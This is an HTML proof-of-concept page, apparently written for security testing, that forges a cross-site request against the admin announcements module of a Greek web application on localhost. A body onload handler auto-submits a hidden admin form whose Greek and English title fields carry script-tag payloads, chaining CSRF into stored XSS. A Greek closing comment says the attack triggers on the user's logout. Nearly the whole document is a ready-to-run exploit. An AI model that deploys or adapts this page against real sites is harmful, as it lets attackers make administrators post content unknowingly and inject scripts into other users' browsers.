<body onload='boomboom()'>
<form method='post' action='http://localhost:1180/modules/admin/adminannouncements.php?localize=el'>

<table width='99%' class='FormData' align='left'><tbody>
                <tr><th width='220'>&nbsp;</th><td><b>Προσθήκη ανακοίνωσης διαχειριστή</b></td></tr>
                <tr><th class='left'>Ορατή</th>
                    <td><input type='checkbox' value='1' name='visible' checked /></td></tr>
                <tr><td colspan='2'>&nbsp;</td></tr>
                <tr><th class='left'>Τίτλος</th>
                    <td><input type='text' name='title' value='<script>alert("CSRF-XSS Title Attack");</script>' size='50' class='FormData_InputText' /></td></tr>
                <tr><th class='left'>Ανακοίνωση</th>
                    <td><table class='xinha_editor'>
                            <tr><td><textarea id='xinha' name='newContent'></textarea>
                                    </td></tr></table>
                        </td></tr>
                <tr><th class='left'>Σχόλια</th>
                    <td><textarea name='comment' rows='2' cols='50' class='FormData_InputText'></textarea>
                        </td></tr>
                <tr><td colspan='2'>&nbsp;</td></tr>
                <tr><th class='left'>Τίτλος (Αγγλικά)</th>
                    <td><input type='text' name='title_en' value='<script>alert("CSRF-XSS Title Attack English");</script>' size='50' class='FormData_InputText' /></td></tr>
                <tr><th class='left'>Ανακοίνωση (Αγγλικά)</th>
                    <td><table class='xinha_editor'>
                            <tr><td><textarea id='xinha_en' name='newContent_en'></textarea>
                                    </td></tr>
                         </table></td></tr>
               <tr><th class='left'>Σχόλια (Αγγλικά)</th>
                   <td><textarea name='comment_en' rows='2' cols='50' class='FormData_InputText'></textarea>
                       </td></tr>
              <tr><th class='left'>&nbsp;</th>
                  <td><input type='submit' name='submitAnnouncement' id ='boom' value='Υποβολή' /></td></tr>
              <tr><td colspan='2'>&nbsp;</td></tr>
          </tbody>
       </table>
    </form>

    <script type="text/javascript">
      function boomboom() {
        document.getElementById("boom").click();
      }
</script>



/******************************************************************************
Δουλεύει κατα το logout του χρήστη εκτελώντας το Αγγλικό ή το Ελληνικό ατακ ανάλογα
με την γλώσσα του χρήστη
*******************************************************************************/